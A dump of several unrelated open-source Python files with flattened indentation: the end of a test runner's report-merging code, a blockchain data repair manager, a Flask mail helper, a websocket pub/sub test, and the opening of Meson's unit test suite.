if "".join(sorted(k)) == "".join(sorted(key)):
return True
return False
def merge_reports(filespath):
log.info("Merging of report files from "+str(filespath))
testsuites = {}
if not isinstance(filespath, list):
filespaths = filespath.split(",")
else:
filespaths = filespath
for filepath in filespaths:
xml_files = glob.glob(filepath)
if not isinstance(filespath, list) and filespath.find("*"):
xml_files.sort(key=os.path.getmtime)
for xml_file in xml_files:
log.info("-- " + xml_file + " --")
doc = xml.dom.minidom.parse(xml_file)
testsuitelem = doc.getElementsByTagName("testsuite")
for ts in testsuitelem:
tsname = ts.getAttribute("name")
tserros = ts.getAttribute("errors")
tsfailures = ts.getAttribute("failures")
tsskips = ts.getAttribute("skips")
tstime = ts.getAttribute("time")
tstests = ts.getAttribute("tests")
issuite_existed = False
tests = {}
testsuite = {}
# fill testsuite details
if tsname in list(testsuites.keys()):
testsuite = testsuites[tsname]
tests = testsuite['tests']
else:
testsuite['name'] = tsname
testsuite['errors'] = tserros
testsuite['failures'] = tsfailures
testsuite['skips'] = tsskips
testsuite['time'] = tstime
testsuite['testcount'] = tstests
issuite_existed = False
testcaseelem = ts.getElementsByTagName("testcase")
# fill test case details
for tc in testcaseelem:
testcase = {}
tcname = tc.getAttribute("name")
tctime = tc.getAttribute("time")
tcerror = tc.getElementsByTagName("error")
tcname_filtered = filter_fields(tcname)
if compare_with_sort(tests, tcname_filtered):
testcase = tests[tcname_filtered]
testcase['name'] = tcname
else:
testcase['name'] = tcname
testcase['time'] = tctime
testcase['error'] = ""
if tcerror:
testcase['error'] = str(tcerror[0].firstChild.nodeValue)
tests[tcname_filtered] = testcase
testsuite['tests'] = tests
testsuites[tsname] = testsuite
log.info("\nNumber of TestSuites="+str(len(testsuites)))
tsindex = 0
for tskey in list(testsuites.keys()):
tsindex = tsindex+1
log.info("\nTestSuite#"+str(tsindex)+") "+str(tskey)+", Number of Tests="+str(len(testsuites[tskey]['tests'])))
pass_count = 0
fail_count = 0
tests = testsuites[tskey]['tests']
xunit = XUnitTestResult()
for testname in list(tests.keys()):
testcase = tests[testname]
tname = testcase['name']
ttime = testcase['time']
inttime = float(ttime)
terrors = testcase['error']
tparams = ""
if "," in tname:
tparams = tname[tname.find(","):]
tname = tname[:tname.find(",")]
if terrors:
failed = True
fail_count = fail_count + 1
xunit.add_test(name=tname, status='fail', time=inttime,
errorType='membase.error', errorMessage=str(terrors), params=tparams
)
else:
passed = True
pass_count = pass_count + 1
xunit.add_test(name=tname, time=inttime, params=tparams
)
str_time = time.strftime("%y-%b-%d_%H-%M-%S", time.localtime())
abs_path = os.path.dirname(os.path.abspath(sys.argv[0]))
root_log_dir = os.path.join(abs_path, "logs{0}testrunner-{1}".format(os.sep, str_time))
if not os.path.exists(root_log_dir):
os.makedirs(root_log_dir)
logs_folder = os.path.join(root_log_dir, "merged_summary")
try:
os.mkdir(logs_folder)
except:
pass
output_filepath="{0}{2}mergedreport-{1}".format(logs_folder, str_time, os.sep).strip()
xunit.write(output_filepath)
xunit.print_summary()
log.info("Summary file is at " + output_filepath+"-"+tsname+".xml")
return testsuites
def reruntests(rerun, names, options, arg_i, arg_p,runtime_test_params):
if "=" in rerun:
reruns = rerun.split("=")
rerun_type = reruns[0]
rerun_count = int(reruns[1])
all_results = {}
log.info("NOTE: Running " + rerun_type + " tests for " + str(rerun_count) + " times maximum.")
report_files = []
for testc in range(rerun_count+1):
if testc == 0:
log.info("\n*** FIRST run of the tests ***")
else:
log.info("\n*** "+rerun_type.upper()+" Tests Rerun#" + str(testc) + "/" + str(rerun_count) + " ***")
results, xunit, report_file = runtests(names, options, arg_i, arg_p, runtime_test_params)
all_results[(testc + 1)] = results
all_results[str(testc+1)+"_report"] = report_file+"*.xml"
report_files.append(report_file+"*.xml")
tobe_rerun = False
for result in results:
if result["result"] == rerun_type:
tobe_rerun = True
if not tobe_rerun:
break
tp, tf = parse_junit_result_xml(report_file+"*.xml")
if "fail" == rerun_type:
names = tf
elif "pass" == rerun_type:
names = tp
log.info("\nSummary:\n" + str(all_results))
log.info("Final result: merging...")
merge_reports(report_files)
return all_results
def main():
log.info("TestRunner: parsing args...")
names, runtime_test_params, arg_i, arg_p, options = parse_args(sys.argv)
log.info("TestRunner: start...")
# get params from command line
TestInputSingleton.input = TestInputParser.get_test_input(sys.argv)
# ensure command line params get higher priority
runtime_test_params.update(TestInputSingleton.input.test_params)
TestInputSingleton.input.test_params = runtime_test_params
log.info("Global Test input params:")
pprint(TestInputSingleton.input.test_params)
if names:
if options.merge:
merge_reports(options.merge)
elif options.rerun:
results = reruntests(options.rerun, names, options, arg_i, arg_p, runtime_test_params)
else:
results, _, _ = runtests(names, options, arg_i, arg_p,runtime_test_params)
else:
log.warning("Warning: No tests got selected. Please double check the .conf file and other "
"options!")
log.info("TestRunner: end...")
def watcher():
"""This little code snippet is from
http://greenteapress.com/semaphores/threading_cleanup.py (2012-07-31)
It's now possible to interrupt the testrunner via ctrl-c at any time
in a platform neutral way."""
if sys.platform == 'win32':
p = Process(target=main, name="MainProcess")
p.start()
try:
p.join()
rc = p.exitcode
if rc > 0:
sys.exit(rc)
except KeyboardInterrupt:
log.error('KeyBoardInterrupt')
p.terminate()
else:
child = os.fork()
if child == 0:
main() # child runs test
try:
rc = os.waitpid(child, 0)[1] //256 # exit status is the high order byte of second member of the tuple
if rc > 0:
sys.exit( rc )
except KeyboardInterrupt:
log.error('KeyBoardInterrupt')
try:
os.kill(child, signal.SIGKILL)
except OSError:
pass
except OSError:
pass
sys.exit()
if __name__ == "__main__":
watcher()
|
repair_manager.py | # -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import hashlib
import time
import threading
import queue
import os
import sys
sys.path.extend(["../../", os.path.abspath(os.path.dirname(__file__))])
from bbc1.core.data_handler import DataHandler
from bbc1.core.bbc_stats import BBcStats
from bbc1.core import bbclib
from bbc1.core.message_key_types import PayloadType, KeyType, InfraMessageCategory
from bbc1.core import logger
class RepairManager:
"""Data repair manager for forged transaction/asset"""
REQUEST_REPAIR_TRANSACTION = 0
REQUEST_REPAIR_ASSET_FILE = 1
REQUEST_TO_SEND_TRANSACTION_DATA = 2
RESPONSE_TRANSACTION_DATA = 3
REQUEST_TO_SEND_ASSET_FILE = 4
RESPONSE_ASSET_FILE = 5
def __init__(self, network=None, domain_id=None, workingdir=".", loglevel="all", logname=None):
if network is not None:
self.network = network
self.core = network.core
self.stats = network.core.stats
self.data_handler = network.domains[domain_id]['data']
else:
self.stats = BBcStats()
self.repair_log = os.path.join(workingdir, domain_id.hex(), "repair_log.json")
self.logger = logger.get_logger(key="repair_manager", level=loglevel, logname=logname)
self.domain_id = domain_id
self.queue = queue.Queue()
self.requesting_list = dict()
self.loop_flag = True
th_nw_loop = threading.Thread(target=self._manager_loop)
th_nw_loop.setDaemon(True)
th_nw_loop.start()
def _output_log(self, repair_info):
"""Output log in json format"""
with open(self.repair_log, "a") as f:
f.write(json.dumps(repair_info)+"\n")
def exit_loop(self):
"""Exit the manager loop"""
self.loop_flag = False
self.put_message()
def _manager_loop(self):
"""Main loop"""
while self.loop_flag:
msg = self.queue.get()
if msg is None:
continue
if msg[KeyType.command] == RepairManager.REQUEST_REPAIR_TRANSACTION:
self._repair_transaction_data(msg[KeyType.transaction_id])
elif msg[KeyType.command] == RepairManager.REQUEST_REPAIR_ASSET_FILE:
self._repair_asset_file(msg[KeyType.asset_group_id], msg[KeyType.asset_id])
elif msg[KeyType.command] == RepairManager.REQUEST_TO_SEND_TRANSACTION_DATA:
self._send_transaction_data(msg)
elif msg[KeyType.command] == RepairManager.RESPONSE_TRANSACTION_DATA:
self._receive_transaction_data_from_others(msg)
elif msg[KeyType.command] == RepairManager.REQUEST_TO_SEND_ASSET_FILE:
self._send_asset_file(msg)
elif msg[KeyType.command] == RepairManager.RESPONSE_ASSET_FILE:
self._receive_asset_file_from_others(msg)
def put_message(self, msg=None):
"""append a message to the queue"""
self.queue.put(msg)
def _repair_transaction_data(self, transaction_id):
"""Repair forged transaction_data or asset_file by getting legitimate one from other nodes
Args:
transaction_id (bytes): target transaction_id
"""
#print("_repair_transaction_data:")
self.stats.update_stats_increment("transaction", "repair_request", 1)
forged_asset_files = set()
if len(self.data_handler.db_adaptors) > 1:
valid_txobj = None
db_nums_with_invalid_data = list()
for idx in range(1, len(self.data_handler.db_adaptors)):
result_txobj, result_asset_files = self.data_handler.search_transaction(transaction_id=transaction_id, db_num=idx)
txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(result_txobj[0],
result_asset_files)
if txobj_is_valid and valid_txobj is None:
valid_txobj = result_txobj[0]
if not txobj_is_valid:
db_nums_with_invalid_data.append(idx)
if len(invalid_assets) > 0:
for ent in invalid_assets:
forged_asset_files.add(ent)
if valid_txobj is None:
self.stats.update_stats_increment("transaction", "fail_to_repair_in_local", 1)
self.logger.fatal("Failed to repair transaction locally (transaction_id=%s in domain=%s)" %
(transaction_id.hex(), self.domain_id.hex()))
else:
for i in db_nums_with_invalid_data:
self.data_handler.restore_transaction_data(db_num=i, transaction_id=transaction_id, txobj=valid_txobj)
self.stats.update_stats_increment("transaction", "success_repair", 1)
self._output_log({"transaction_id": transaction_id.hex(), "request_at": int(time.time()),
"repaired_by": "locally", "repaired_at": int(time.time())})
if len(forged_asset_files) > 0:
for asgid, ast in forged_asset_files:
self._repair_asset_file(asset_group_id=asgid, asset_id=ast, need_check=False)
if self.data_handler.replication_strategy == DataHandler.REPLICATION_EXT:
return
random_nonce = bbclib.get_random_value(4)
while random_nonce in self.requesting_list:
random_nonce = bbclib.get_random_value(4)
self.requesting_list[random_nonce] = {
"transaction_id": transaction_id.hex(),
"request_at": int(time.time())
}
msg = {
KeyType.domain_id: self.domain_id,
KeyType.infra_msg_type: InfraMessageCategory.CATEGORY_DATA,
KeyType.infra_command: DataHandler.REPAIR_TRANSACTION_DATA,
KeyType.command: RepairManager.REQUEST_TO_SEND_TRANSACTION_DATA,
KeyType.transaction_id: transaction_id,
KeyType.nonce: random_nonce,
}
self.network.broadcast_message_in_network(domain_id=self.domain_id,
payload_type=PayloadType.Type_any, msg=msg)
return
def _repair_asset_file(self, asset_group_id, asset_id, need_check=True):
"""Repair forged asset_file by getting legitimate one from other nodes
Args:
asset_group_id (bytes): asset_group_id of the asset
asset_id (bytes): asset_id of the asset
need_check (bool): If True, check the digest of the asset file
"""
#print("_repair_asset_file:")
if self.data_handler.use_external_storage:
return
if need_check:
asset_file = self.data_handler.get_in_storage(asset_group_id, asset_id)
if asset_file is not None and asset_id == hashlib.sha256(asset_file).digest():
return
random_nonce = bbclib.get_random_value(4)
while random_nonce in self.requesting_list:
random_nonce = bbclib.get_random_value(4)
self.requesting_list[random_nonce] = {
"asset_group_id": asset_group_id.hex(),
"asset_id": asset_id.hex(),
"request_at": int(time.time())
}
msg = {
KeyType.domain_id: self.domain_id,
KeyType.infra_msg_type: InfraMessageCategory.CATEGORY_DATA,
KeyType.infra_command: DataHandler.REPAIR_TRANSACTION_DATA,
KeyType.command: RepairManager.REQUEST_TO_SEND_ASSET_FILE,
KeyType.asset_group_id: asset_group_id,
KeyType.asset_id: asset_id,
KeyType.nonce: random_nonce,
}
self.network.broadcast_message_in_network(domain_id=self.domain_id,
payload_type=PayloadType.Type_any, msg=msg)
def _send_transaction_data(self, dat):
"""Send transaction data if having valid one"""
#print("_send_transaction_data::")
transaction_id = dat[KeyType.transaction_id]
for idx in range(len(self.data_handler.db_adaptors)):
result_txobj, result_asset_files = self.data_handler.search_transaction(transaction_id=transaction_id, db_num=idx)
txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(result_txobj[transaction_id])
if txobj_is_valid:
dat[KeyType.command] = RepairManager.RESPONSE_TRANSACTION_DATA
dat[KeyType.transaction_data] = bbclib.serialize(result_txobj[transaction_id])
dat[KeyType.destination_node_id] = dat[KeyType.source_node_id]
self.network.send_message_in_network(None, domain_id=self.domain_id, msg=dat)
return
def _receive_transaction_data_from_others(self, dat):
"""Receive transaction data from other core_nodes and check its validity
Args:
dat (dict): received message
"""
#print("_receive_transaction_data_from_others:")
if KeyType.transaction_data not in dat or KeyType.transaction_id not in dat or KeyType.nonce not in dat:
return
if dat[KeyType.nonce] not in self.requesting_list:
return
asset_files = dict()
if KeyType.all_asset_files in dat:
asset_files = dat[KeyType.all_asset_files]
txobj, fmt_type = bbclib.deserialize(dat[KeyType.transaction_data])
if txobj.transaction_data is None:
return
txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(txobj, asset_files)
if txobj_is_valid:
self.stats.update_stats_increment("transaction", "success_repair", 1)
for idx in range(len(self.data_handler.db_adaptors)):
self.data_handler.restore_transaction_data(db_num=idx, transaction_id=txobj.transaction_id, txobj=txobj)
add_info = {
"repaired_by": dat[KeyType.source_node_id].hex(),
"repaired_at": int(time.time())
}
self.requesting_list[dat[KeyType.nonce]].update(add_info)
self._output_log(self.requesting_list[dat[KeyType.nonce]])
del self.requesting_list[dat[KeyType.nonce]]
def _send_asset_file(self, dat):
"""Send the asset file if having valid one
Args:
dat (dict): received message
"""
#print("_send_asset_file::")
asset_group_id = dat[KeyType.asset_group_id]
asset_id = dat[KeyType.asset_id]
asset_file = self.data_handler.get_in_storage(asset_group_id, asset_id)
if asset_file is None:
return
result_txobj, result_asset_files = self.data_handler.search_transaction(asset_group_id=asset_group_id,
asset_id=asset_id)
txobj = next(iter(result_txobj.values()))
txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(txobj, result_asset_files)
if (asset_group_id, asset_id) in valid_assets:
dat[KeyType.command] = RepairManager.RESPONSE_ASSET_FILE
dat[KeyType.asset_group_id] = asset_group_id
dat[KeyType.asset_id] = asset_id
dat[KeyType.asset_file] = asset_file
dat[KeyType.destination_node_id] = dat[KeyType.source_node_id]
self.network.send_message_in_network(None, domain_id=self.domain_id, msg=dat)
def _receive_asset_file_from_others(self, dat):
"""Receive asset file from other core_nodes and check its validity
Args:
dat (dict): received message
"""
#print("_receive_asset_file_from_others:")
if KeyType.nonce not in dat or dat[KeyType.nonce] not in self.requesting_list:
return
if KeyType.asset_group_id not in dat or KeyType.asset_id not in dat or KeyType.asset_file not in dat:
return
asset_group_id = dat[KeyType.asset_group_id]
asset_id = dat[KeyType.asset_id]
asset_file = dat[KeyType.asset_file]
if asset_file is None:
return
asset_files = {asset_id: asset_file}
result_txobj, result_asset_files = self.data_handler.search_transaction(asset_group_id=asset_group_id,
asset_id=asset_id)
txobj = next(iter(result_txobj.values()))
txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(txobj, asset_files)
if (asset_group_id, asset_id) in valid_assets:
self.data_handler.store_in_storage(asset_group_id, asset_id, asset_file, do_overwrite=True)
add_info = {
"repaired_by": dat[KeyType.source_node_id].hex(),
"repaired_at": int(time.time())
}
self.requesting_list[dat[KeyType.nonce]].update(add_info)
self._output_log(self.requesting_list[dat[KeyType.nonce]])
del self.requesting_list[dat[KeyType.nonce]]
|
email.py | from flask import render_template,current_app
from flask_mail import Message
from app.extensions import mail
from threading import Thread
def async_send_mail(app, msg):
# 获取当前程序的上下文
with app.app_context():
mail.send(message=msg)
def send_mail(subject, to, tem, **kwargs):
app = current_app._get_current_object()
msg = Message(subject=subject, recipients=[to], sender=app.config['MAIL_USERNAME'])
msg.html = render_template('email/'+tem + '.html', **kwargs)
send = Thread(target=async_send_mail, args=(app, msg))
send.start()
|
server_subscriber_test.py | import os
import sys
from fastapi_websocket_rpc import logger
# Add parent path to use local src as package for tests
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import asyncio
from multiprocessing import Process
import requests
import pytest
import uvicorn
from fastapi import APIRouter, FastAPI
from fastapi_websocket_rpc.logger import get_logger
from fastapi_websocket_rpc.utils import gen_uid
from fastapi_websocket_pubsub import PubSubEndpoint, PubSubClient, Subscription, Topic
logger = get_logger("Test")
# Configurable
PORT = int(os.environ.get("PORT") or "7990")
uri = f"ws://localhost:{PORT}/pubsub"
trigger_url = f"http://localhost:{PORT}/trigger"
DATA = "MAGIC"
SERVER_TOPIC = "event/has-happened"
CLIENT_TOPIC = "event/has-been-processed"
def setup_server_rest_route(app, endpoint: PubSubEndpoint):
@app.get("/trigger")
async def trigger_events():
logger.info("Triggered via HTTP route - publishing event")
# Publish an event - to the our own server callback / which will trigger another event for the client
# Since we are calling back (RPC) to the client- this would deadlock if we wait on it
asyncio.create_task(endpoint.publish([SERVER_TOPIC], data=DATA))
return "triggered"
def setup_server():
app = FastAPI()
# PubSub websocket endpoint
endpoint = PubSubEndpoint()
endpoint.register_route(app, "/pubsub")
# receive an event and publish another (this time for the client)
async def event_callback(subscription:Subscription, data):
logger.info(f"Got topic {subscription.topic} - re-publishing as {CLIENT_TOPIC}")
asyncio.create_task(endpoint.publish([CLIENT_TOPIC], data))
@app.on_event("startup")
async def startup():
# subscribe to our own events
await endpoint.subscribe([SERVER_TOPIC], event_callback)
# Regular REST endpoint - that publishes to PubSub
setup_server_rest_route(app, endpoint)
uvicorn.run(app, port=PORT)
@pytest.fixture()
def server():
# Run the server as a separate process
proc = Process(target=setup_server, args=(), daemon=True)
proc.start()
yield proc
proc.kill() # Cleanup after test
@pytest.mark.asyncio
async def test_server_subscribe_http_trigger(server):
# finish trigger
finish = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
# subscribe for the event
client.subscribe(CLIENT_TOPIC, on_event)
# start listentining
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
# trigger the server via an HTTP route
requests.get(trigger_url)
# wait for finish trigger
await asyncio.wait_for(finish.wait(),5)
|
run_unittests.py | #!/usr/bin/env python3
# Copyright 2016-2021 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import zipfile, tarfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.dependencies.factory
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter
from mesonbuild.interpreterbase import typed_pos_args, InvalidArguments, ObjectHolder
from mesonbuild.interpreterbase import typed_pos_args, InvalidArguments, typed_kwargs, ContainerTypeInfo, KwargInfo
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, windows_proof_rm, python_command,
version_compare, split_args, quote_arg, relpath, is_linux, git
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException, OptionKey
from mesonbuild.dependencies import PkgConfigDependency
from mesonbuild.programs import ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.scripts import destdir_join
from mesonbuild.mtest import TAPParser, TestResult
from mesonbuild.mesonmain import setup_vsenv
from mesonbuild.wrap.wrap import PackageDefinition, WrapException
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
if T.TYPE_CHECKING:
from mesonbuild.compilers import Compiler
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]:
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return str(m.group(1))
return None # The file did not contain the specified entry.
def get_soname(fname: str) -> T.Optional[str]:
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname: str) -> T.Optional[str]:
raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
# Get both '' and None here
if not raw:
return None
# nix/nixos adds a bunch of stuff to the rpath out of necessity that we
# don't check for, so clear those
final = ':'.join([e for e in raw.split(':') if not e.startswith('/nix')])
return final
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def _git_init(project_dir):
# If a user has git configuration init.defaultBranch set we want to override that
with tempfile.TemporaryDirectory() as d:
out = git(['--version'], str(d))[1]
if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
extra_cmd = ['--initial-branch', 'master']
else:
extra_cmd = []
subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
_git_add_all(project_dir)
def _git_add_all(project_dir):
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest(f'pkg-config dependency {depname} not found.')
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, f'detect_{lang}_compiler')
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest(f'No {lang} compiler found.')
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest(f'Env var {key!r} set, skipping')
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
key = OptionKey(feature)
if key not in cc.base_options:
raise unittest.SkipTest(
f'{feature} not available with {cc.id}')
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
a = cc.compiler_args(['-I.'])
#first we are checking if the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
#think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
#then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
# check include order is kept when deduplicating
a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
a += ['-Ifirst']
self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class_clike(self):
